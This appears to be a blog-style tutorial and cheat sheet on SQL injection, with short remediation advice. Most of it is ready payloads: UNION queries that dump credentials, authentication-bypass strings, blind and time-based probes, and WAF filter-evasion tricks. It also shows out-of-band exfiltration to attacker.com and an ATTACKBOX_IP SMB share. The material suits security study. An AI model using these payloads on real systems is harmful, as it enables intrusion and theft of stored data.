$ cat sql-injection-from-basics-to-advanced.md
SQL Injection - From Basics to Advanced
> March 19, 2024
| Web Exploitation
๐ง SQL Basics
-- Selecting all users
SELECT * FROM users;
-- Inserting data into the table
INSERT INTO users (username, password) VALUES ('user', 'password');
-- Updating data in the table
UPDATE users SET username='root', password='pass123' WHERE username='admin';
-- Deleting data from the table
DELETE FROM users WHERE username='admin';
๐ SQL Injection (SQLi)
๐ญ Types of SQL Injections
1. In-Band SQLi
- โ Most common and easiest to exploit.
- Results are visible immediately on the web page.
๐น Variants:
- Error-Based SQLi: Reveals info via DBMS error messages.
- Union-Based SQLi: Leverages
UNIONto retrieve additional data.
๐งช Examples:
-- Get list of databases
?id=0 UNION SELECT 1,2,group_concat(schema_name) FROM information_schema.schemata;
-- Get tables in a database
?id=0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema='sqli_one';
-- Get columns of a table
?id=0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name='staff_users';
-- Dump credentials
?id=0 UNION SELECT 1,2,group_concat(username, ':', password) FROM staff_users;
2. Blind SQLi - Authentication Bypass
- โ Web page works without any errors shown.
- Behavior-based, not output-based.
๐งช Examples:
' OR 1=1;--
' OR 1=1 LIMIT 1-- -
3. Blind SQLi - Boolean Based
- โ Slow and tedious.
- Boolean responses (true/false) change app behavior.
๐งช Examples:
admin' UNION SELECT 1,2,3;--
admin123' UNION SELECT 1,2,3 WHERE database() LIKE 's%';--
4. Blind SQLi - Time Based
- โฑ๏ธ Uses DB delays to infer true/false.
๐งช Examples:
admin123' UNION SELECT SLEEP(5);--
referrer=admin123' UNION SELECT SLEEP(5),2 FROM users WHERE username LIKE 'admin' AND password LIKE '4961';
5. Out-of-Band SQLi
- โ๏ธ Relies on external services (e.g., DNS, HTTP) to exfiltrate data.
- Used when in-band methods are blocked.
๐ก๏ธ Remediation Techniques
-
Prepared Statements (Parameterized Queries)
โ Separates SQL logic and data. -
Input Validation
โ Only allow expected data formats. -
Escaping User Input
โ Use backslashes to escape quotes/special characters.
๐ Advanced Techniques
1. Second-Order SQLi
- Stored SQLi โ payload is stored in DB and triggered later.
- Hard to detect, bypasses frontend filters.
2. Filter Evasion Techniques
- Encoding: URL, Hex, Unicode.
- No-Quote Injection: Avoid using
'or".
๐ธ Techniques:
- Use Numbers:
OR 1=1 - SQL Comments:
admin'--oradmin/**/-- - CONCAT Function:
CONCAT(0x61,0x64,0x6D,0x69,0x6E) - No Spaces: Use
/**/,\t,%09,%0A,%0D, etc.
๐งช Filter Bypass Scenarios
| Scenario | Description | Example |
|---|---|---|
| SELECT is banned | Bypass using case variations or comments | SE/**/LECT * FROM/**/users |
| Spaces are banned | Use alternative whitespace or comments | SELECT%0A*%0AFROM%0Ausers |
| Logical operators banned (AND/OR) | Use &&, ||, or string functions |
username='admin'/**/||/**/1=1 -- |
| UNION, SELECT banned | Use hex/unicode encoding | CHAR(0x61,0x64,0x6D,0x69,0x6E) |
| All common keywords banned | Obfuscate via string functions and comments | CONCAT('a','d','m','i','n') or SE/**/LECT * FROM/**/users |
๐ค Out-of-Band SQLi (OOB)
- Works through different channels (DNS, HTTP, SMB).
- Common in restrictive environments.
MySQL / MariaDB
SELECT sensitive_data FROM users INTO OUTFILE '/tmp/out.txt';
MSSQL
EXEC xp_cmdshell 'bcp "SELECT sensitive_data FROM users" queryout "\\10.10.58.187\logs\out.txt" -c -T';
Oracle
DECLARE
req UTL_HTTP.REQ;
resp UTL_HTTP.RESP;
BEGIN
req := UTL_HTTP.BEGIN_REQUEST('http://attacker.com/exfiltrate?sensitive_data=' || sensitive_data);
UTL_HTTP.GET_RESPONSE(req);
END;
๐ก Tip: Use
impacket-smbserverimpacket-smbserver -smb2support -comment "Logs Server" -debug logs /tmpThen trigger via:
1'; SELECT @@version INTO OUTFILE '\\ATTACKBOX_IP\logs\out.txt'; --
๐ต๏ธโโ๏ธ Other SQLi Vectors
1. HTTP Header Injection
curl -H "User-Agent: ' UNION SELECT username, password FROM user; #" http://target.site
2. Common Detection Challenges
- Dynamic queries (string concatenation).
- Multiple injection points (headers, cookies, body).
- Security features like WAF, IDS.
- Context-sensitive injection (e.g., JSON, XML, GraphQL).